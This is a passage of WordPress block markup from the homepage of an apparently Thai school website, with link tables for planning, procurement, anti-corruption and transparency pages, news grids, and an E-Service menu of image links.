href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- 